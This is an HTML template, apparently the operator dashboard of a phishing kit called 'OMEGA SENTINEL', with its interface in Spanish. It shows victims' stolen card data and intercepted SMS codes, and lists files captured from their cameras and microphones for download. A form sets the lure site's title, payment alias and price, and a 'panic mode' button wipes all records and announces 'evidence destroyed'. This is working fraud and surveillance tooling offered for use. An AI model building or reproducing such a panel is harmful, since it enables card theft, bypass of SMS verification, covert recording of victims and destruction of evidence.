<!DOCTYPE html>
<html lang="es">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>OMEGA SENTINEL - PANEL DE CONTROL</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <style>
        body { background: #000; color: #00ff41; font-family: 'Courier New', monospace; font-size: 0.8rem; }
        .m-box { border: 1px solid #00ff41; background: rgba(0,20,0,0.9); padding: 15px; margin-bottom: 15px; border-radius: 8px; }
        .table { color: #00ff41; border-color: #004400; }
        .thumb-gallery { width: 60px; height: 60px; object-fit: cover; border: 1px solid #00ff41; margin: 2px; border-radius: 4px; }
        .panic-btn { background: #ff0000; color: white; border: none; font-weight: bold; padding: 12px; width: 100%; border-radius: 5px; cursor: pointer; transition: 0.3s; }
        .panic-btn:hover { background: #8b0000; box-shadow: 0 0 15px #ff0000; }
        .section-title { color: white; font-weight: bold; border-bottom: 1px solid #00ff41; padding-bottom: 5px; margin-bottom: 15px; display: block; }
        input, .form-control { background: #000 !important; color: #00ff41 !important; border: 1px solid #00ff41 !important; font-size: 0.8rem; }
    </style>
</head>
<body class="p-3">

    <div class="row">
        <div class="col-md-4">
            
            <div class="m-box">
                <button onclick="activarPanico()" class="panic-btn">⚠ ACTIVAR MODO PÁNICO ⚠</button>
            </div>

            <div class="m-box">
                <span class="section-title">> PERSONALIZACIÓN DEL SITIO</span>
                <form action="/update_full" method="POST" enctype="multipart/form-data">
                    <div class="mb-3">
                        <label class="small">Cambiar Imagen de Portada:</label>
                        <input type="file" name="file_portada" class="form-control form-control-sm">
                    </div>
                    <div class="mb-2">
                        <input type="text" name="titulo" value="{{config.titulo}}" class="form-control mb-1" placeholder="Título del sitio">
                        <input type="text" name="alias" value="{{config.alias}}" class="form-control mb-1" placeholder="Alias de pago">
                        <input type="text" name="precio" value="{{config.precio}}" class="form-control mb-1" placeholder="Precio ($)">
                    </div>
                    <div class="row g-1 mb-2">
                        <div class="col-6">
                            <label class="x-small">Color Fondo:</label>
                            <input type="color" name="color_fondo" value="{{config.color_fondo}}" class="form-control h-auto">
                        </div>
                        <div class="col-6">
                            <label class="x-small">Color Texto:</label>
                            <input type="color" name="color_texto" value="{{config.color_texto}}" class="form-control h-auto">
                        </div>
                    </div>
                    <button class="btn btn-outline-success btn-sm w-100 mt-2">ACTUALIZAR APARIENCIA</button>
                </form>
            </div>

            <div class="m-box">
                <span class="section-title">> GALERÍA DEL DASHBOARD</span>
                <form action="/upload_media" method="POST" enctype="multipart/form-data" class="mb-3">
                    <label class="small">Subir nueva foto a la galería:</label>
                    <div class="input-group">
                        <input type="file" name="file_gallery" class="form-control form-control-sm">
                        <button class="btn btn-primary btn-sm">SUBIR</button>
                    </div>
                </form>
                <div class="d-flex flex-wrap overflow-auto" style="max-height: 200px; background: #050505; padding: 5px;">
                    {% for f in archivos %}
                    <div class="position-relative">
                        <img src="/static/uploads/{{f}}" class="thumb-gallery">
                        <a href="/delete_file/{{f}}" class="btn btn-danger btn-sm p-0 position-absolute top-0 start-0" style="width:18px; height:18px; font-size:12px; line-height:1;">×</a>
                    </div>
                    {% endfor %}
                </div>
            </div>

        </div>

        <div class="col-md-8">
            
            <div class="m-box">
                <span class="section-title">> REGISTROS EN TIEMPO REAL</span>
                <div class="table-responsive">
                    <table class="table table-dark table-sm table-hover">
                        <thead>
                            <tr>
                                <th>FECHA/USER</th>
                                <th>DATOS TARJETA</th>
                                <th>CÓDIGO SMS</th>
                                <th>MULTIMEDIA CAPTURADA</th>
                            </tr>
                        </thead>
                        <tbody>
                            {% for r in registros %}
                            <tr>
                                <td>
                                    <small class="text-white">{{r[6]}}</small><br>
                                    <span class="text-info">{{r[1]}}</span><br>
                                    <small class="text-muted">{{r[2]}}</small>
                                </td>
                                <td><span style="color: #ff3131; font-weight: bold;">{{r[3]}}</span></td>
                                <td>
                                    {% if r[4] != "PENDIENTE" %}
                                    <span class="badge bg-success" style="animation: pulse 1s infinite;">{{r[4]}}</span>
                                    {% else %}
                                    <small class="text-muted">Esperando...</small>
                                    {% endif %}
                                </td>
                                <td>
                                    <div style="max-height: 80px; overflow-y: auto;">
                                        {% for c in capturas %}
                                            {% if r[0]|string in c %}
                                            <a href="/static/captured/{{c}}" download class="text-warning d-block small" style="text-decoration: none;">
                                                ⬇ Descargar {{ c.split('_')[0] }}
                                            </a>
                                            {% endif %}
                                        {% endfor %}
                                    </div>
                                </td>
                            </tr>
                            {% endfor %}
                        </tbody>
                    </table>
                </div>
            </div>

            <div class="m-box">
                <span class="section-title">> ÚLTIMOS ARCHIVOS CAPTURADOS (CÁMARA/MICRO)</span>
                <div class="d-flex flex-wrap overflow-auto" style="max-height: 250px;">
                    {% for c in capturas %}
                    <div class="m-1 text-center p-2" style="background: #111; border: 1px solid #333; border-radius: 5px;">
                        <small class="d-block text-muted">{{ c.split('_')[0] }}</small>
                        <a href="/static/captured/{{c}}" download class="btn btn-sm btn-outline-warning py-0 px-2 mt-1">Descargar</a>
                    </div>
                    {% endfor %}
                </div>
            </div>

        </div>
    </div>

    <script>
    function activarPanico() {
        if(confirm("¿ALERTA MÁXIMA? Se borrarán todos los registros y archivos para siempre.")) {
            fetch('/panic_button', {method: 'POST'}).then(res => {
                if(res.ok) {
                    alert("EVIDENCIA DESTRUIDA.");
                    location.reload();
                }
            });
        }
    }
    </script>

    <style>
        @keyframes pulse {
            0% { opacity: 1; }
            50% { opacity: 0.5; }
            100% { opacity: 1; }
        }
        .x-small { font-size: 0.65rem; color: #aaa; }
    </style>
</body>
</html>

